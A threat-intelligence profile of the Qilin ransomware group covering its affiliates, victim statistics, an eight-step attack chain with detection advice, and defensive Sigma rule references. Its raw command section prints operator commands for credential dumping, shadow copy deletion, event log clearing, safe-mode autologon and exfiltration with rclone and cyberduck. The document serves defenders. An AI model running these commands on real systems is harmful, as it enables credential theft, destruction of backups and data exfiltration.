Qilin - ShroudCloud

# Qilin Ransomware (Agenda / GOLD FEATHER / Phantom Mantis / Water Galura) **Type:** Ransomware-as-a-Service (RaaS) - Open Affiliate Model **Also tracked as:** Agenda (original name), GOLD FEATHER, Phantom Mantis (Group-IB), Water Galura (Trend Micro) **First observed:** Mid-2022 (as "Agenda" in Golang); rebranded to Qilin with Rust rewrite Sep 2022. Operator "Haise" advertised on RAMP forum Feb 2023. **Status:** Active - **#1 most active RaaS operation Q1 2026** with 342 victims (107 Jan, 104 Feb, 131 Mar). 1,000+ victims in 2025. Three consecutive months above 100 is unprecedented for any single group. --- ## Threat Overview Open RaaS run by Russian-speaking operators, state-tolerated (CIS exclusion list hardcoded in binaries). Originally "Agenda" (Golang, 2022), rebranded to Qilin with a Rust rewrite in Sep 2022. Dual-track extortion: data exfil via Cyberduck/Rclone/WinSCP/MEGA, then encryption via configurable Rust payload. Leak site on Tor + clearnet (WikiLeaksV2). Unique TTP: Chrome credential harvesting via GPO logon script - cascading impact beyond the original victim org. | Field | Value | |---|---| | Ransom note | `README-RECOVER-<ext>.txt` or `<company_id>-RECOVER-README.txt` | | File extension | Unique per victim (company ID), configurable by affiliate | | Encryption | AES-256-CTR (with AES-NI) or ChaCha20 + RSA-4096 OAEP | | Encryption modes | fast, percent, normal, step-skip | | Contact | Tor onion DLS, WikiLeaksV2 clearnet | | Top targets (geo) | US (629), France (79), Canada (74) | | Top targets (sector) | Manufacturing (198), Technology (140), Healthcare (134) | | Cross-platform | Windows (Rust), Linux/ESXi (C-based), vCenter spread | | Self-deletion | Yes - deletes payload post-encryption | --- ## Activity Standing Dominant. Q1 2026: **Qilin (342)**, Akira (194), LockBit5, SafePay, Sinobi. No other group came close. Q1 2026 totaled 2,165 victims across the ecosystem - Qilin alone accounts for 15.8%. Absorbed **RansomHub affiliates** after RansomHub went dark April 1, 2025. Group-IB observed Qilin DLS disclosures doubled from February 2025 onward. Affiliate payout: 85% (>$3M ransom), 80% (≤$3M). Payments go to affiliate wallets first, then operator share is transferred - standard trust-building for volume recruitment. Notable affiliates: **Scattered Spider** (Octo Tempest), **Moonstone Sleet** (DPRK state actor, per Microsoft Mar 2025), **FIN12/DEV-0237** (healthcare focus), Arkana Security, Devman. 2025 total: 1,000+ victims. Primary targets: Manufacturing (198), Technology (140), Healthcare (134). Geo: US (629), France (79), Canada (74). --- ## Initial Access **Primary:** Stolen credentials - VPN, RDP, Citrix. Qilin affiliates are frequent IAB customers on RAMP, purchasing valid credentials for remote access gateways. Compromised VPN portals without MFA are a recurring theme. **Secondary:** Vulnerability exploitation - FortiGate CVE-2024-21762 (OOB write, RCE) and CVE-2024-55591 (auth bypass), SAP NetWeaver CVE-2025-31324, Veeam Backup CVE-2023-27532 (unauthenticated credential request). **Tertiary:** ScreenConnect supply chain compromise (Jan 2025, tracked as STAC4365) - evilginx AitM phishing of MSP admins, intercepting MFA TOTP, granting super-admin access to downstream customer environments. --- ## Infection Chain ### Step 1 - Initial Access: Stolen Credentials / Exploitation **ATT&CK:** T1078, T1133, T1190 Affiliate gains access via stolen VPN/RDP credentials (often purchased from IABs on RAMP) or exploitation of FortiGate CVE-2024-21762/CVE-2024-55591, SAP NetWeaver CVE-2025-31324, or Veeam CVE-2023-27532. In the Jan 2025 ScreenConnect campaign (STAC4365), an evilginx AitM phishing site intercepted MSP admin credentials and MFA TOTP, granting super-admin access to customer environments downstream. Dwell time from initial access to post-exploitation activity: 18 days observed in one case. > **Detection Opportunity:** Credential-based initial access is inherently difficult to detect at the endpoint. Defenders should baseline VPN/RDP authentication logs for anomalous source geolocations, impossible travel, and authentication bursts. Correlate remote login events with known employee locations. This is a log source gap for organizations that do not ingest VPN auth logs into their SIEM. ### Step 2 - Reconnaissance **ATT&CK:** T1087.002, T1016, T1018, T1033 Domain enumeration via `nltest`, `net group`, `Get-ADComputer`, AdFind. Network scanning with masscan, Netscan, Angry IP Scanner. Process/defense inspection via PCHunter64.exe, Powertool64.exe. Share enumeration via PowerView `Invoke-ShareFinder`. > **Detection Opportunity:** Defenders should alert on rapid sequential execution of domain enumeration tools - `nltest.exe`, `net.exe`, `net1.exe`, `AdFind.exe`, and `netscan.exe` spawning within a short window from the same host. A single instance is noisy; a burst of three or more within minutes is high-fidelity. Additionally, monitor for `Invoke-ShareFinder` or equivalent PowerView modules loaded via PowerShell. > > See rule(s): [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-adfind-enum]] ### Step 3 - Credential Access **ATT&CK:** T1003.001, T1555.003, T1112 Embedded Mimikatz module targets lsass.exe, winlogon.exe, wininit.exe for token extraction. `!light.bat` modifies WDigest `UseLogonCredential` to 1, forcing Windows to retain plaintext credentials in memory. Veeam CVE-2023-27532 exploitation dumps backup credentials. **Chrome credential harvesting** via GPO logon script: PowerShell `IPScanner.ps1` deployed to SYSVOL, executed on every user logon for 3 days, harvesting Chrome-stored passwords across the domain. > **Detection Opportunity:** Monitor for registry modifications setting `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential` to `1` - this forces plaintext credential storage and has no legitimate use on modern Windows. Also monitor for LSASS memory access patterns consistent with credential dumping (minidum-style access to lsass.exe). For the Chrome harvester, alert on PowerShell scripts executing from SYSVOL paths (`\\<DC>\SYSVOL\`), which indicates GPO-deployed code - rare in most environments and high-signal when it does occur. > > See rule: [[edr-win-cred-lsass-minidump]] ### Step 4 - Defense Evasion (BYOVD / EDR Killer) **ATT&CK:** T1562.001, T1574.002, T1068 DLL sideloading: `msimg32.dll` loaded by a legitimate process. Two-stage loader: first stage prepares execution environment, neutralizes user-mode hooks, suppresses ETW logging, conceals API calls. Second stage (EDR killer) runs entirely in memory. Loads two vulnerable drivers: **rwdrv.sys** (renamed "ThrottleStop.sys") for physical memory access and **hlpdrv.sys** for process termination. Iterates hardcoded list of 300+ EDR driver names, using physical memory writes via rwdrv.sys to unregister kernel monitoring callbacks (process creation, thread creation, image loading). Same drivers observed in Akira and Makop campaigns. Windows Defender disabled, event logs cleared via PowerShell. > **Detection Opportunity:** Monitor for `msimg32.dll` being loaded from any path outside `System32` or `SysWOW64` - this is a known DLL sideloading vector shared across Qilin, Akira, and Makop. Alert on driver loads for `rwdrv.sys`, `hlpdrv.sys`, or `ThrottleStop.sys` - these are vulnerable drivers abused for physical memory access. Defenders should also monitor for bulk event log clearing: PowerShell enumerating all event logs via `Get-WinEvent -ListLog *` followed by `ClearLog()` calls is a near-certain indicator of anti-forensic activity. > > See rule: [[edr-win-def-defender-tampering]] ### Step 5 - Lateral Movement **ATT&CK:** T1021.002, T1570, T1219 `--spread` flag activates worm-like propagation: deploys embedded PsExec v2.43 to `%Temp%` under a random filename, spreads payload across domain computers using operator-supplied credentials. MaxMpxCt registry set to 65535 for maximum concurrent SMB connections. Additional tools: WinRM, NetExec, RDP, ScreenConnect, AnyDesk, Chrome Remote Desktop. `--spread-vcenter` variant targets ESXi: disables HA/DRS on clusters, changes passwords, enables SSH, uploads and executes Linux payload. > **Detection Opportunity:** Defenders should monitor for `cmd.exe` spawning with output redirected to `\\127.0.0.1\ADMIN$\` - this is Impacket WmiExec's signature pattern. Alert on PsExec-style remote service creation, especially when the executable is launched from `%Temp%` with a random filename. Watch for registry modifications setting `MaxMpxCt` to `65535` under `HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters` - no legitimate application sets SMB concurrent connections this high, and it is a strong indicator of ransomware propagation tuning. Also monitor for renamed Sysinternals utilities (PsExec with non-standard filenames). > > See rule(s): [[edr-win-lat-impacket-wmiexec]] | [[edr-win-lat-remote-psexec]] ### Step 6 - C2 and Persistence **ATT&CK:** T1071.001, T1572 Cobalt Strike v4.x beacons with Malleable C2 (spoofed HTTP headers). SystemBC SOCKS5 proxy. SliverC2 observed in Pistachio Tempest operations. Known Cobalt Strike domains: `ikea0[.]com`, `lebondogicoin[.]com`. SystemBC C2: `93.115.25[.]139`. Additional RMM tools (AnyDesk, ScreenConnect, GoToDesk, QuickAssist) for persistence. Execution gated by SHA-256 hashed password argument. > **Detection Opportunity:** Monitor for unauthorized RMM tool installations - AnyDesk, ScreenConnect, GoToDesk, and QuickAssist are frequently abused for persistence. Alert on multiple RMM tools installed on a single endpoint, or any RMM tool not on the organization's approved software list. For Cobalt Strike, monitor for named pipes, anomalous HTTP beaconing patterns, and process injection into `rundll32.exe` or `dllhost.exe`. DNS queries to known C2 domains are IOC-tier and will age out, but are worth blocking proactively. ### Step 7 - Exfiltration **ATT&CK:** T1048, T1567.002 Cyberduck (primary in recent cases), Rclone, WinSCP, FileZilla, MEGA cloud storage. WinRAR for staging, exfil via easyupload[.]io observed. Volumes: 30 GB to 783 GB documented. Rclone renamed to blend with legitimate tools. > **Detection Opportunity:** Defenders should monitor for Rclone execution regardless of binary name - look for the PE metadata and internal strings rather than the filename, since attackers routinely rename it. Alert on Cyberduck CLI execution (`cyberduck-cli`), which is increasingly preferred by Qilin affiliates over Rclone. Monitor for large outbound data transfers to cloud storage providers (S3, MEGA, easyupload.io). WinRAR staging large archives to a single directory followed by outbound transfer is a common pre-exfil pattern. > > See rule: [[edr-win-exfil-rclone-usage]] ### Step 8 - Impact (Encryption) **ATT&CK:** T1486, T1490, T1529 Ransomware binary (Rust) with configurable encryption: AES-256-CTR (AES-NI systems) or ChaCha20, RSA-4096 OAEP for key wrapping. Modes: fast, percent, normal, step-skip. VSS deleted (`vssadmin delete shadows /all /quiet`), VSS service disabled (`wmic service ... ChangeStartMode Disabled`). `--safe-mode` flag: changes user password, enables autologon via Winlogon registry, reboots into safe mode for encryption without EDR interference. Execution directory: `C:\PerfLogs` or `C:\temp` (binary as `w.exe` or `update.exe`). Self-deletes post-encryption. GPO-based deployment observed: scheduled task via `run.bat` downloads and executes payload. Ransom note: `README-RECOVER-<ext>.txt`. > **Detection Opportunity:** Alert on VSS deletion commands (`vssadmin delete shadows`) and VSS service being disabled - these are near-universal pre-encryption indicators. Monitor for safe-mode autologon preparation: writing `DefaultPassword` to `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon` combined with `AutoAdminLogon` set to `1` is almost always malicious. Watch for `bcdedit /set safeboot` commands. GPO-based ransomware deployment (scheduled tasks created via Group Policy) requires AD audit log visibility - verify your environment ingests Group Policy change events. > > See rule: [[edr-win-impact-inhibit-recovery]] --- ## Raw Command Lines Observed operator commands from IR reports and vendor analysis. `[R]` = reconstructed from described behavior. **Reconnaissance** ``` nltest /dclist: net group "Domain Admins" /domain Get-ADComputer -Filter * -Properties Name | Select-Object Name import-module .\ShareFinder.ps1 ; Invoke-ShareFinder -CheckShareAccess -Verbose net use ``` **Credential access** ``` sekurlsa::logonpasswords lsadump::sam reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f [R] ``` **Chrome credential harvesting (GPO logon script)** ``` IPScanner.ps1 [R] logon.bat → powershell.exe -ep bypass -f \\<DC>\SYSVOL\<DOMAIN>\scripts\IPScanner.ps1 [R] ``` **VSS deletion and service manipulation** ``` vssadmin.exe delete shadows /all /quiet wmic service where name='vss' call ChangeStartMode Disabled net stop vss ``` **Event log clearing** ``` powershell $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)} ``` **SMB tuning for propagation** ``` reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /t REG_DWORD /d 65535 /f [R] ``` **Symbolic link evaluation** ``` fsutil behavior set SymlinkEvaluation R2R:1 fsutil behavior set SymlinkEvaluation R2L:1 ``` **Safe-mode autologon** ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f [R] reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d <USER> /f [R] reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d <PASS> /f [R] bcdedit /set {default} safeboot network [R] shutdown /r /t 0 [R] ``` **Lateral movement (--spread)** ``` <random>.exe \\<TARGET> -accepteula -u <DOMAIN>\<USER> -p <PASS> -s -d cmd.exe /c <PAYLOAD> [R] ``` **Exfiltration** ``` cyberduck-cli transfer <target_path> s3://<bucket> [R] rclone copy \\<FILESERVER>\shares remote:exfil --transfers 16 --checkers 32 [R] ``` --- ## Intelligence Gaps - **Affiliate TTP divergence** - Open model with Scattered Spider, DPRK actors, and ex-RansomHub affiliates means TTPs will vary significantly per incident. No single canonical chain. - **Chrome credential harvester scope** - Sophos documented one case (Jul 2024). Unknown if this is a standard playbook item or one affiliate's innovation. - **EDR killer driver list** - 300+ drivers targeted but full list not publicly released. Defenders cannot validate coverage against the kill list. - **Linux/ESXi variant under-documented** - C-based variant for ESXi exists but limited public IR reports on the Linux chain. - **GPO audit gap** - GPO-based ransomware deployment and Chrome harvester both require AD audit logs. Organizations should verify ingestion of Group Policy change events in their SIEM. - **Cyberduck exfil detection** - Increasingly preferred over Rclone in Qilin cases. Most detection stacks lack behavioral coverage for Cyberduck CLI. --- ## Confidence Assessment | Claim | Confidence | Evidence | Flips if... | |---|---|---|---| | Russian-speaking operators | HIGH | CIS exclusion lists, RAMP forum activity, multiple vendor assessments | Affiliate misattributed as core | | RansomHub affiliate absorption | HIGH | Group-IB, THN, timing correlation with April 2025 shutdown | Affiliates split to multiple RaaS | | Moonstone Sleet (DPRK) affiliate | HIGH | Microsoft Threat Intelligence attribution (Mar 2025) | MSFT revises attribution | | Scattered Spider affiliate | MEDIUM | Vendor reporting, shared TTPs | Overlap =/= affiliation | | #1 Q1 2026 by volume | HIGH | Ransomware.live, Breachsense, Purple Ops tracking | Data lag or duplicate counting | | Chrome credential harvesting as standard TTP | LOW | Single Sophos case (Jul 2024) | Additional IR reports confirm | | State-tolerated (not state-directed) | MEDIUM | CIS exclusion, no law enforcement action, forum posture | Direct state tasking evidence | --- ## Detections Sigma rules applicable to this threat: | Rule ID | Description | |---|---| | [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net | | [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest | | [[edr-win-disc-adfind-enum]] | AdFind LDAP Enumeration | | [[edr-win-cred-lsass-minidump]] | LSASS Memory Dump via Comsvcs.dll | | [[edr-win-cred-veeam-db-access]] | Veeam Backup Credential Database Access | | [[edr-win-cred-reg-hive-dump]] | Registry Hive Credential Dump | | [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement | | [[edr-win-lat-remote-psexec]] | Remote PsExec Service Execution | | [[edr-win-exfil-rclone-usage]] | Rclone Data Exfiltration | | [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition | | [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell | | [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution | --- ## Key Publications 1. [Cisco Talos - Qilin EDR Killer Infection Chain](https://blog.talosintelligence.com/qilin-edr-killer/) (Apr 2026) 2. [Cisco Talos - Uncovering Qilin Attack Methods](https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/) (2025) 3. [Sophos - Qilin Stealing Chrome Credentials](https://www.sophos.com/en-us/blog/qilin-ransomware-caught-stealing-credentials-stored-in-google-chrome) (Aug 2024) 4. [Sophos - Qilin Affiliates Target ScreenConnect](https://www.sophos.com/en-us/blog/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect) (Jan 2025) 5. [SANS - Evolution of Qilin RaaS](https://www.sans.org/blog/evolution-qilin-raas) (2025) 6. [FalconFeeds - Qilin Strategic Threat Assessment 2022-2026](https://falconfeeds.io/blogs/qilin-ransomware-cartel-strategic-threat-assessment-2022-2026) (2026) 7. [Check Point - Qilin/Agenda Deep Dive](https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/qilin-ransomware/) (2025) 8. [Barracuda - Qilin Surges into 2026](https://blog.barracuda.com/2026/01/15/qilin-ransomware-surges-into-2026) (Jan 2026) 9. [CIS - Qilin Top Threat to SLTTs Q2 2025](https://www.cisecurity.org/insights/blog/qilin-top-ransomware-threat-to-sltts-in-q2-2025) (2025) 10. [Halcyon - Qilin.B Enhanced Encryption](https://www.halcyon.ai/blog/new-qilin-b-ransomware-variant-boasts-enhanced-encryption-and-defense-evasion) (2024) 11. [Ransomware.live - Qilin Tracker](https://www.ransomware.live/group/qilin) (ongoing) 12. [Breachsense - March 2026 Ransomware Report](https://www.breachsense.com/ransomware-reports/march-2026/) (Mar 2026)